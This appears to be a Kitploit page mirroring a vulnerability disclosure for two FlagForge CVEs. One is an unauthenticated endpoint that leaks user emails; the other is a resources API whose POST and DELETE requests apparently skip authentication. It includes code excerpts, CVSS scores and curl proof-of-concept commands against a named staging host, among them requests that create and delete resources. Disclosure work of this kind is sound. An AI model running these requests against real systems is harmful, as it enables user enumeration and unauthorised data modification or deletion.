Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-59843-CVE-2025-59932 — CVE on FlagForge on versions 2.0.0 to 2.3.0. Upgrade to version 2.3.1 to fix the issue. | Kitploit
Tools/GitHubGitHub/at0mxploit/cve-2025-59843-cve-2025-59932
Vulnerability AnalysisInformation GatheringWeb SecurityPenetration TestingMisconfigurationAPI Security
GitHubat0mxploit/cve-2025-59843-cve-2025-59932

CVE-2025-59843-CVE-2025-59932

CVE on FlagForge on versions 2.0.0 to 2.3.0. Upgrade to version 2.3.1 to fix the issue.

View Repository
1311 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-59843 & CVE-2025-59932

1. Public Exposure of User Email Addresses CVE-2025-59843

In Scope / Affected Application: FlagForge Web Application

API Endpoint: /api/user/[username]

Details: The endpoint returns user email addresses without authentication. Any username can be queried publicly.

Root Cause / Code Reference:

root@kitploit:~
const user = await UserSchema.findOne({
  name: { $regex: new RegExp(`^${username}$`, 'i') }
}).select('name email image totalScore customBadges createdAt role');

// No authentication check is performed
email: user.email, // Exposed publicly

Severity (CVSS v4.0): 5.5 (Medium)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:P/CR:M/IR:L/AR:L/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:N/MVA:N/MSC:L/MSI:N/MSA:N/AU:Y/RE:L

Impact: Attackers can enumerate users and access email addresses, leading to potential privacy violations.

Proof of Concept (PoC):

root@kitploit:~
curl "https://staging.flagforge.xyz/api/user/No%20Reply"
Sample Response:

{
  "success": true,
  "user": {
    "name": "No Reply",
    "email": "<REDACTED>",
    ...
  }
}

2. Potential Unauthenticated Resource Modification/Deletion CVE-2025-59932

In Scope / Affected Application: FlagForge Web Application

API Endpoint: /api/resources

Details:

GET /api/resources exposes all resources publicly.

Based on code review, POST and DELETE requests are not enforce authentication or authorization. These requests were not tested on the live system to avoid impacting production data.

Observed Headers (OPTIONS request):

root@kitploit:~
❯ curl -i -X OPTIONS "https://staging.flagforge.xyz/api/resources"
HTTP/2 204
access-control-allow-origin: https://staging.flagforge.xyz
allow: DELETE, GET, HEAD, OPTIONS, POST
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
date: Thu, 25 Sep 2025 15:03:45 GMT
permissions-policy: geolocation=(), microphone=(), camera=(), payment=()
pragma: no-cache
referrer-policy: no-referrer
server: Vercel
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch
x-content-type-options: nosniff
x-frame-options: DENY
x-matched-path: /api/resources
x-vercel-cache: MISS
x-vercel-id: bom1::iad1::v7k72-1758812623945-4e3fad4b58b4
x-xss-protection: 1; mode=block

Severity (CVSS v4.0, if POST/DELETE are unauthenticated): 7.8 (High)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:U/CR:M/IR:H/AR:M/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:H/MVA:L/MSC:L/MSI:H/MSA:L/S:N/AU:Y/RE:M/U:Red

Impact: If POST or DELETE are unauthenticated, an attacker could potentially create or delete resources, impacting platform integrity.

Proof of Concept (PoC):

root@kitploit:~
curl -X GET "https://staging.flagforge.xyz/api/resources"

This will give you the _id of the resources.

root@kitploit:~
curl -X POST "https://staging.flagforge.xyz/api/resources" \
-H "Content-Type: application/json" \
-d '{"title":"Test","description":"Test","category":"Web","resourceLink":"https://example.com","uploadedBy":"tester"}'
root@kitploit:~
curl -X DELETE "https://staging.flagforge.xyz/api/resources?id=<resource-id>"

Download Tool